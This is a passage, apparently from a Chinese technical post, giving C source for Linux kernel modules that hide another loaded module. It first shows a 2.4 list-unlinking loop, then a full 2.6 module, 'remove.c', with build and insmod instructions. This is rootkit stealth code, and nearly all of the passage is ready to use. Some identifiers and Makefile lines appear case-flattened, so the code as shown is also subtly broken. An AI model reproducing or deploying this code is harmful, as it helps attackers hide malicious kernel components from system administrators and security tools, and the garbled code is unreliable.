struct module *p; 　　for (p=&__this_module; p->next; p=p->next) 　　　　{ 　　　　　　if (strcmp(p->next->name, str)) 　　　　　　　　continue; 　　　　　　p->next=p->next->next; // <-- here it removes that module 　　　　　　break; 　　　　} 2.4的module定义为： struct module { 　　unsigned long size_of_struct; /* == sizeof(module) */ 　　struct module *next; 　　const char *name; 　　unsigned long size; 　　... } 2.6为： struct module { 　　enum module_state state; 　　/* member of list of modules */ 　　struct list_head list; <--- 变成了双向链表 　　/* unique handle for this module */ 　　char name[module_name_len]; 　　... } 因此使用标准的内核list系列处理函数(不需要再闭门造车了)，2.6版的进程隐藏重写为： /* * filename: remove.c * author: coolq * date: 23:05 2004-9-2 * makefile: * ---------------- cut here ----------------- * obj-m += remove.o * kdir:= /lib/modules/&#36;(shell uname -r)/build * pwd:= &#36;(shell pwd) * default: * &#36;(make) -c &#36;(kdir) subdirs=&#36;(pwd) modules *----------------- cut here ----------------- * compile: * [root@coolq tmp]make * usage: * [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide */ #include <linux/init.h> #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/kernel.h> #include <linux/list.h> #include <linux/string.h> static char *mod_name = "module"; module_param(mod_name, charp, 0); static int remove_init(void) { 　　struct module *mod_head, *mod_counter; 　　struct list_head *p; 　　mod_head = &__this_module; 　　list_for_each(p, &mod_head->list){ 　　　　mod_counter = list_entry(p, struct module, list); 　　　　if(strcmp(mod_counter->name, mod_name) == 0){ 　　　　　　list_del(p); 　　　　　　printk("remove module &#37;s successfully.\n", mod_name); 　　　　　　return 0; 　　　　} 　　} 　　printk("can't find module &#37;s.\n", mod_name); 　　return 0; } static void remove_exit(void) { } module_init(remove_init); module_exit(remove_exit); module_license("dual bsd/gpl");